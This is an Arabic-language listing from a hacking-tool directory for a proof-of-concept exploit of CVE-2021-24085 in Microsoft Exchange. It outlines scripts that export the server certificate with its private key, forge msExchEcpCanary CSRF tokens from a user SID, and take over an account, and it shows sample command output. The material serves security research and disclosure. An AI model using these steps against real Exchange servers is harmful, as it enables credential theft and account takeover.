Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-24085 | Kitploit
أدوات/GitHubGitHub/sourceincite/cve-2021-24085
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubsourceincite/cve-2021-24085

CVE-2021-24085

عرض المستودع
7118منذ 5 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Microsoft Exchange Server msExchEcpCanary ثغرة تزوير الطلبات عبر المواقع (CSRF) ورفع الامتيازات

هذا برهان مفهوم لـ CVE-2021-24085.

  1. يقوم poc.py بتنزيل ملف شهادة الهدف مع المفتاح الخاص بداخله
  2. يقوم YellowCanary بتوليد رمز msExchEcpCanary المميز لـ csrf لمستخدم معين استنادًا إلى SID
  3. poc.js هو استغلال csrf لتفعيل الاستيلاء على حساب

لم أقدم ملف malicifest.xml ولكن يمكنك العثور على معلومات حول كيفية إنشاء ملف manifest خبيث من الموارد المتاحة في قسم المراجع أدناه.

مثال

الوصول إلى الشهادة مع المفتاح الخاص بداخلها:

root@kitploit:~
researcher@srcincite:~$ ./poc.py
(+) usage: ./poc.py <target> <user:pass>
(+) eg: ./poc.py 192.168.75.142 [email protected]:user123###

researcher@srcincite:~$ ./poc.py 192.168.75.142 [email protected]:user123###
(+) found the thumbprint: F4EB6AADB8D7C0D12E756BA2E28F90CCACD41299
(+) exported the cert to the target filesystem
(+) saved the cert to testcert.der using password: hax

يمكنك الآن توليد رموز csrf باستخدام YellowCanary عبر SID المستخدم الهدف:

root@kitploit:~
c:\Users\researcher>poc.exe S-1-5-21-257332918-392067043-4020791575-3104 testcert.der hax

            #====================================================
            # YellowCanary - generate msExchEcpCanary csrf tokens
            #====================================================

security identifier : S-1-5-21-257332918-392067043-4020791575-3104
msExchEcpCanary     : sA0o0nS_C0G_PMdcA_dAd5BdAEL_-NcYhndaAwlhBJFs4a4iKy4sn53azH-O5Ix3F0jnwzZZUsk.

المراجع:

  • https://www.mdsec.co.uk/2019/01/abusing-office-web-add-ins-for-fun-and-limited-profit/
  • https://info.phishlabs.com/blog/office-365-phishing-uses-malicious-app-persist-password-reset
تنزيل الأداة